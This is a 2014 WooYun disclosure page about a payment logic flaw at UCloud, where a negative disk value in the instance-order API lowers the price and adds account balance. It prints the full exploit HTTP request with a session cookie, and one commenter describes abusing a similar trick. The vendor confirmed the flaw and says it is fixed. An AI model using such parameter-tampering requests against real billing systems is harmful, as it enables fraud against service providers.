当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048562

漏洞标题:UCloud 支付系统存在逻辑错误 导致可刷钱购买任意主机(已证明)

相关厂商:UCloud

漏洞作者: 猪猪侠

提交时间:2014-01-11 18:34

修复时间:2014-02-25 18:35

公开时间:2014-02-25 18:35

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-11: 细节已通知厂商并且等待厂商处理中
2014-01-13: 厂商已经确认,细节仅向厂商公开
2014-01-23: 细节向核心白帽子及相关领域专家公开
2014-02-02: 细节向普通白帽子公开
2014-02-12: 细节向实习白帽子公开
2014-02-25: 细节向公众公开

简要描述:

UCloud 支付系统存在判断错误 可导致刷钱购买任意主机(已证明)

详细说明:

#1 问题描述
由于在创建云主机填写服务器参数时,服务器未严格校验来自客户端提交的订单参数。
#2 漏洞原因
DISK参数未判断是否为负数,导致计算最终金额失误

POST /api/instance/order
pay_mode=2&count=1&cpu=2&disk=-2000000&memory=2048&


#3 利用EXP

POST /api/instance/order HTTP/1.1
Host: uhost.ucloud.cn
Connection: keep-alive
Content-Length: 353
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://uhost.ucloud.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://uhost.ucloud.cn/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: PHPSESSID=ST-1389411761r767E0AD311ECA06177; Hm_lvt_62f4f23a826efd41750a4479e4cb2491=1387715471,1388750071,1389411748; Hm_lpvt_62f4f23a826efd41750a4479e4cb2491=1389413539; __utma=242209926.1025238294.1383140674.1389013138.1389411747.39; __utmb=242209926.35.10.1389411747; __utmc=242209926; __utmz=242209926.1383186629.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided)
pay_mode=2&count=1&cpu=2&disk=-2000000&memory=2048&band_width=1&isp_id=0&hostname=ucloudvpshd001&image_id=cd57da3144a01e03dd844ea3b23d2954&image_name=CentOS+6.5+64%E4%BD%8D&password=**********&public_secgroup=8095&use_high_performance_disk=0&individual_disk=&net_lanch=0&quantity=1&ecshop_license=&use_session=yes&format=json&region_id=1&zone_id=1


即可成功生成一个订单,并可执行支付!

ucloud_orders.jpg


漏洞证明:

# 成功支付后,获得了很多余额,并可以购买主机

ucloud_blance.jpg


ucloud_pay_test.jpg


ucloud_ok.jpg

修复方案:

# 服务端做严格判断
~! 我是用正常用户做的测试,请别封号呀,里面还有我自己的余额的!

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-01-13 22:39

厂商回复:

感谢,已经修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-01-11 12:54 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    87V5!

  2. 2014-01-11 12:58 | BadCat ( 实习白帽子 | Rank:81 漏洞数:21 | 悲剧的我什么都不会)

    前排围观

  3. 2014-01-11 18:44 | 九九 ( 路人 | Rank:5 漏洞数:4 | 暂无。)

    前排围观

  4. 2014-01-12 00:09 | 宇少 ( 普通白帽子 | Rank:106 漏洞数:41 | Jyhack-TeaM:bbs.jyhack.com 群:308694453...)

    mark~

  5. 2014-02-25 20:36 | tSt ( 路人 | Rank:27 漏洞数:7 | 在开发里运维最强,运维里网络最强,网络里...)

    危害等级:低-_-!

  6. 2014-02-25 22:56 | 乌云一哥 ( 路人 | Rank:7 漏洞数:1 | echo file_get_contents('http://www.wooyu...)

    危害等级是低无疑。这个洞早已知道而且在使用,他们注册账号和开关试用服务器都是人工的。。。别指望可以刷个结束日期就可以长期使用。。。。

  7. 2014-02-25 22:59 | 乌云一哥 ( 路人 | Rank:7 漏洞数:1 | echo file_get_contents('http://www.wooyu...)

    注:我不是胡扯的,我亲测,我绕过按键不能点击开了一个一年的试用主机,但是在使用了十多天后,他们给我打电话,问我们试用的服务器是否满意,是否可以关闭了。。。。。不信自己试试